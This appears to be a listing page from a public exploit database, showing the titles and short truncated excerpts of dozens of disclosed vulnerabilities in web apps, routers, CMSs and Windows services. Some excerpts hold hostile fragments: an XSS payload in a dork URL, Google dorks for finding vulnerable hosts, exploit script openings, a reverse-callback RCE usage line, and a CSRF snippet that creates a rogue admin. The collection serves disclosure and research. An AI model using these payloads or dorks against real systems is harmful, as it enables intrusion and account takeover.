Super Socializer 7.13.52 - Reflected XSS

Exploit Title: Super Socializer 7.13.52 - Reflected XSS Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=thechampsharingcount&urls%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E=https://www.google.com Date: 2023-06-20 Exploit Author: Amirhossein Bahramizadeh Category :...

Music Gallery Site v1.0 - Broken Access Control

Exploit Title: Music Gallery Site v1.0 - Broken Access Control Exploit Author: Muhammad Navaid Zafar Ansari Date: 21 February 2023 CVE Assigned: CVE-2023-0963 mitre.org nvd.nist.org Vendor Homepage: https://www.sourcecodester.com Software Link: Music Gallery Site Version: v 1.0 Tested on: Windows...

Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path

Exploit Title: Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path Exploit Author: Milad Karimi Ex3ptionaL Exploit Date: 2023-01-18 Vendor : Microsoft Version : 15.02.1118.007 Tested on OS: Microsoft Exchange Server 2019 CU12 PoC :...

Solaris 10 libXm - Buffer overflow Local privilege escalation

/ Exploit Title: Solaris 10 libXm - Buffer overflow Local privilege escalation raptordtprintlibXmas.c - Solaris 10 CDE ForeverDay LPE Copyright c 2023 Marco Ivaldi "What has been will be again, what has been done will be done again; there is nothing new under the Sun." -- Ecclesiastes 1:9 Solaris...

WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)

Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting XSS Date: 2022-06-05 Exploit Author: Sanjay Singh Vendor Homepage: https://motopress.com/ Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip Version: 4.2.4...

REDCap 11.3.9 - Stored Cross Site Scripting

Exploit Title: REDCap 11.3.9 - Stored Cross-Site Scripting Date: 2021-10-11 Exploit Author: Kendrick Lam References: https://github.com/KCL04/XSS-PoCs/blob/main/CVE-2021-42136.js Vendor Homepage: https://projectredcap.org Software Link: https://projectredcap.org Version: Redcap before 11.4.0 Test...

Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path

Exploit Title: Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path Exploit Author: Manthan Chhabra netsectuna, Harshit fumenoid Version: 2020.2.20328.2050 Date: 02/04/2022 Vendor Homepage: http://gimmal.com/ Vulnerability Type: Unquoted Service Path Tested on: Windows 10 CVE:...

Private Internet Access 3.3 - 'pia-service' Unquoted Service Path

Exploit Title: Private Internet Access 3.3 - 'pia-service' Unquoted Service Path Date: 04/03/2022 Exploit Author: Saud Alenazi Vendor Homepage: https://www.privateinternetaccess.com Software Link: https://www.privateinternetaccess.com/download Version: 3.3.0.100 Tested: Windows 10 x64 Contact:...

OpenBMCS 2.4 - Create Admin / Remote Privilege Escalation

Exploit Title: OpenBMCS 2.4 - Create Admin / Remote Privilege Escalation Exploit Author: LiquidWorm Date: 26/10/2021 OpenBMCS 2.4 Create Admin / Remote Privilege Escalation Vendor: OPEN BMCS Product web page: https://www.openbmcs.com Affected version: 2.4 Summary: Building Management & Controls...

TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)

Exploit Title : TextPattern CMS 4.8.7 - Remote Command Execution Authenticated Date : 2021/09/06 Exploit Author : Mert Daş [email protected] Software Link : https://textpattern.com/filedownload/113/textpattern-4.8.7.zip Software web : https://textpattern.com/ Tested on: Server : Xampp First ...

GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)

Exploit Title: GravCMS 1.10.7 - Arbitrary YAML Write/Update Unauthenticated 2 Original Exploit Author: Mehmet Ince Vendor Homepage: https://getgrav.org Version: 1.10.7 Tested on: Debian 10 Author: legend /usr/bin/python3 import requests import sys import re import base64 target=...

SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)

Exploit Title: SEO Panel 4.8.0 - 'ordercol' Blind SQL Injection 2 Author: nu11secur1ty Testing and Debugging: nu11secur1ty Date: 04/25/2021 Vendor: https://www.seopanel.org/ Link: https://www.seopanel.org/spdownload/4.8.0 CVE: CVE-2021-28419 + Exploit Source: !/usr/bin/python3 Author: @nu11secur1...

SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated)

Exploit Title: SuiteCRM 7.11.15 - 'lastname' Remote Code Execution Authenticated Date: 08 NOV 2020 Exploit Author: M. Cory Billington @th3y Vendor Homepage: https://suitecrm.com/ Software Link: https://github.com/salesagility/SuiteCRM Version: 7.11.15 and below Tested on: Ubuntu 20.04 LTS CVE:...

Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload

Exploit Title: Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload Google Dork: N/A Date: 2020-05-18 Exploit Author: Kishan Lal Choudhary Vendor Homepage: https://monstra.org Software Link: https://bitbucket.org/awilum/monstra/downloads/monstra-3.0.4.zip Version: 3.0.4 Tested on: Ubuntu 1...

ScanGuard Antivirus 2020 - Insecure Folder Permissions

Exploit Title: ScanGuard Antivirus 2020 - Insecure Folder Permissions Date: 2019-10-10 Exploit Author: hyp3rlinx Vendor Homepage: https://www.scanguard.com/ Software Link: https://support.scanguard.com/en/kb/22/upgrades-available Version: 2020 Tested on: Windows CVE : N/A Category: exploit...

Moodle 3.4.1 - Remote Code Execution

php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the teacher Make sure you're running a netcat listener on the...

ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution

Title: ProFTPd 1.3.5 Remote Command Execution Date : 20/04/2015 Author: R-73eN Software: ProFTPd 1.3.5 with modcopy Tested : Kali Linux 1.06 CVE : 2015-3306 Greetz to Vadim Melihow for all the hard work . import socket import sys import requests Banner banner = "" banner += " \n" banner +=" | | /...

Artica Proxy 4.50 - Remote Code Execution (RCE)

Exploit Title: Artica Proxy 4.50 - Remote Code Execution RCE Date: 23-04-2024 Exploit Author: Madan Vendor Homepage: https://artica-proxy.com/ Version: 4.40, 4.50 Tested on: relevant os CVE : CVE-2024-2054 you can also find the exploit on my github repo: https://github.com/Madan301/CVE-2024-2054...

GeoVision GV-ASManager 6.1.0.0 - Information Disclosure

Exploit Title: Information Disclosure in GeoVision GV-ASManager Google Dork: inurl:"ASWeb/Login" Date: 02-FEB-2025 Exploit Author: Giorgi Dograshvili DRAGOWN Vendor Homepage: https://www.geovision.com.tw/ Software Link: https://www.geovision.com.tw/download/product/ Version: 6.1.0.0 or less Teste...

Aztech DSL5005EN Router - 'sysAccess.asp' Admin Password Change (Unauthenticated)

Exploit Title: Aztech DSL5005EN Router - 'sysAccess.asp' Admin Password Change Unauthenticated Date: 2025-02-26 Exploit Author: Amir Hossein Jamshidi Vendor Homepage: https://www.aztech.com Version: DSL5005EN Tested on: Linux CVE: N/A import requests import argparse print''' aztech DSL5005EN...

Microweber 2.0.15 - Stored XSS

Exploit Title: Stored XSS in Microweber Date: 06/18/2024 Exploit Author: tmrswrr Vendor Homepage: https://microweber.me/ Version: 2.0.15 Tested on: http://active.demo.microweber.me/ Vulnerability Description A Stored Cross-Site Scripting XSS vulnerability has been identified in Microweber version...

Moodle 3.10.1 - Authenticated Blind Time-Based SQL Injection - "sort" parameter

Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter Google Dork: Date: 04/11/2023 Exploit Author: Julio Ángel Ferrari Aka. T0X1Cx Vendor Homepage: https://moodle.org/ Software Link: Version: 3.10.1 Tested on: Linux CVE : CVE-2021-36393 import requests import stri...

Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore < 14.8.7825.01 - IDOR

!/usr/bin/python3 Title: Hitachi NAS HNAS System Management Unit SMU Backup & Restore IDOR Vulnerability CVE: CVE-2023-5808 Date: 2023-12-13 Exploit Author: Arslan Masood @arszilla Vendor: https://www.hitachivantara.com/ Version: --id --sso " Create --host argument: parser.addargument "--host",...

Blood Bank & Donor Management System using v2.2 - Stored XSS

Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS Application: Blood Donor Management System Version: v2.2 Bugs: Stored XSS Technology: PHP Vendor Homepage: https://phpgurukul.com/ Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/...

Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)

Exploit Title: Tree Page View Plugin 1.6.7 - Cross Site Scripting XSS Google Dork: inurl:/wp-content/plugins/cms-tree-page-view/ Date: 2023-04-24 Exploit Author: LEE SE HYOUNG hackintoanetwork Vendor Homepage: https://wordpress.org/plugins/cms-tree-page-view/ Software Link:...

Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation

!-- Exploit Title: Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation Exploit Author: LiquidWorm Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: 2.12 EXC5000GX 2.12 EXC120GX 2.11 EXC300GX 2.10 EXC1600GX 2.10 EXC2000GX 2.08 EXC1600GX 2.08 EXC1000GX 2.07...

HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path

Exploit Title: HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path Date: 2022-06-06 Exploit Author: Ali Alipour Vendor Homepage: https://support.hp.com/us-en/document/c01998934 Software Link:...

Wondershare Dr.Fone 12.0.18 - 'Wondershare InstallAssist' Unquoted Service Path

Exploit Title: Wondershare Dr.Fone 12.0.18 - 'Wondershare InstallAssist' Unquoted Service Path Discovery by: Mohamed Alzhrani Discovery Date: 2022-03-08 Vendor Homepage: https://www.wondershare.com/ Software Link : https://download.wondershare.com/drfonefull3360.exe Tested Version: 12.0.18...

django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)

Exploit Title: django-unicorn 0.35.3 - Stored Cross-Site Scripting XSS Date: 10/7/21 Exploit Author: Raven Security Associates, Inc. ravensecurity.net Software Link: https://pypi.org/project/django-unicorn/ Version: = 0.35.3 CVE: CVE-2021-42053 django-unicorn = 0.35.3 suffers from a stored XSS...

Umbraco CMS 8.9.1 - Directory Traversal

Exploit Title: Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write Authenticated Exploit Author: BitTheByte Description: Authenticated path traversal vulnerability. Exploit Research: https://www.tenable.com/security/research/tra-2020-59 Vendor Homepage: https://umbraco.com/ Version:...

Simple Water Refilling Station Management System 1.0 - Remote Code Execution (RCE) through File Upload

Exploit Title: Simple Water Refilling Station Management System 1.0 - Remote Code Execution RCE through File Upload Exploit Author: Matt Sorrell Date: 2021-08-14 Vendor Homepage: https://www.sourcecodester.com Software Link:...

Spy Emergency 25.0.650 - 'Multiple' Unquoted Service Path

Exploit Title: Spy Emergency 25.0.650 - Unquoted Service Path Discovery by: Erick Galindo Discovery Date: 2021-06-11 Vendor Homepage: https://www.spy-emergency.com/ Software Link: https://www.spy-emergency.com/download/download.php?id=1 Tested Version: 25.0.650.0 Vulnerability Type: Unquoted...

IPeakCMS 3.5 - Boolean-based blind SQLi

Exploit Title: IPeakCMS 3.5 - Boolean-based blind SQLi Date: 07.12.2020 Exploit Author: MoeAlbarbari Vendor Homepage: https://ipeak.ch/ Software Link: N/A Version: 3.5 Tested on: BackBox Linux CVE : CVE-2021-3018 Check the CMS version :goto www.site.com/cms/ and you will notice that in the login...

Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path

Exploit Title: Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path Exploit Author : SamAlucard Exploit Date: 2020-11-08 Vendor : Winstep Version : WsxService 18.06.0096 Vendor Homepage : https://www.winstep.net/xtreme.asp Tested on OS: Windows 7 Pro Analyze PoC : ============== C:\sc qc...

Stock Management System 1.0 - Cross-Site Request Forgery (Change Username)

Exploit Title: Stock Management System 1.0 - Cross-Site Request Forgery Change Username Exploit Author: Bobby Cooke & Adeeb Shah @hyd3sec CVE ID: N/A Date: 2020-09-01 Vendor Homepage: https://www.sourcecodester.com/php/14366/stock-management-system-php.html Software Link:...

Victor CMS 1.0 - 'Search' SQL Injection

Exploit Title: Victor CMS 1.0 - 'Search' SQL Injection Date: 2020-08-04 Exploit Author: Edo Maland Vendor Homepage: https://github.com/VictorAlagwu/CMSsite Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip Version: 1.0 Tested on: XAMPP / Windows 10...

Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)

Exploit Title: Nsauditor 3.1.8.0 - 'Name' Denial of Service PoC Discovery by: SajjadBnd Date: 2019-11-30 Vendor Homepage: http://www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Tested Version: 3.1.8.0 Vulnerability Type: Denial of Service DoS Local Tested on...

ThinVNC 1.0b1 - Authentication Bypass

Exploit Title: ThinVNC 1.0b1 - Authentication Bypass Date: 2019-10-17 Exploit Author: Nikhith Tumamlapalli Contributor WarMarX Vendor Homepage: https://sourceforge.net/projects/thinvnc/ Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC1.0b1/ThinVNC1.0b1.zip/download Version:...

Inventory Webapp - 'itemquery' SQL injection

Exploit Title: Inventory Webapp SQL injection Data: 05.09.2019 Exploit Author: mohammad zaheri Vendor HomagePage: https://github.com/edlangley/inventory-webapp Tested on: Windows Google Dork: N/A ========= Vulnerable Page: ========= /php/add-item.php ========== Vulnerable Source: ========== Line3...

Microsoft DirectWrite / AFDKO - Out-of-Bounds Read in OpenType Font Handling Due to Undefined FontName Index

-----===== Background =====----- AFDKO Adobe Font Development Kit for OpenType is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType to some...

PHP DateTime - Use-After-Free

Use After Free Vulnerability in unserialize with DateTime CVE-2015-0273 Taoguang Chen - Write Date: 2015.1.29 - Release Date: 2015.2.20 A use-after-free vulnerability was discovered in unserialize with DateTime/DateTimeZone/DateInterval/DatePeriod objects's wakeup magic method that can be abused...

Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege Escalation (Metasploit)

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' require 'rex' require 'msf/core/post/common' require...

Jax Guestbook 3.31/3.50 - 'jax_Guestbook.php' Cross-Site Scripting

source: https://www.securityfocus.com/bid/28523/info Jax Guestbook is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context...

Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover

Exploit Title: Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover Google Dork: N/A Date: 21/07/2024 Exploit Author: Mohammed Adel Vendor Homepage: https://www.cisco.com Software Link:...

Grocy <=4.0.2 - CSRF

Exploit Title: Grocy history.pushState'','', '/'; document.forms0.submit; If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials Username: hacker Password: test Note: In order for this to work, the target must have Crea...

PHPJabbers Taxi Booking 2.0 - Reflected XSS

Exploit Title: PHPJabbers Taxi Booking 2.0 - Reflected XSS Exploit Author: CraCkEr Date: 22/07/2023 Vendor: PHPJabbers Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/taxi-booking-script/ Version: 2.0 Tested on: Windows 10 Pro Impact: Manipulate the content ...

Zomplog 3.9 - Cross-site scripting (XSS)

Exploit Title: Zomplog 3.9 - Cross-site scripting XSS Application: Zomplog Version: v3.9 Bugs: XSS Technology: PHP Vendor URL: http://zomp.nl/zomplog/ Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip Date of found: 22.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2...

Total CMS 1.7.4 - Remote Code Execution (RCE)

Exploit Title: Total CMS 1.7.4 - Remote Code Execution RCE Date: 02/06/2023 Exploit Author: tmrswrr Version: 1.7.4 Vendor home page : https://www.totalcms.co/ 1 Go to this page and click edit page button https://www.totalcms.co/demo/soccer/ 2After go down and will you see downloads area 3Add in...

MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)

Title: MotoCMS Version 3.4.3 - Server-Side Template Injection SSTI Author: tmrswrr Date: 31/05/2023 Vendor: https://www.motocms.com Link: https://www.motocms.com/website-templates/demo/189526.html Vulnerable Versions: MotoCMS 3.0.27 Description MotoCMS Version 3.4.3 Store Category Template was...

Tenda HG6 v3.3.0 - Remote Command Injection

Exploit Title: Tenda HG6 v3.3.0 - Remote Command Injection Exploit Author: LiquidWorm Tenda HG6 v3.3.0 Remote Command Injection Vulnerability Vendor: Tenda Technology Co.,Ltd. Product web page: https://www.tendacn.com https://www.tendacn.com/product/HG6.html Affected version: Firmware version:...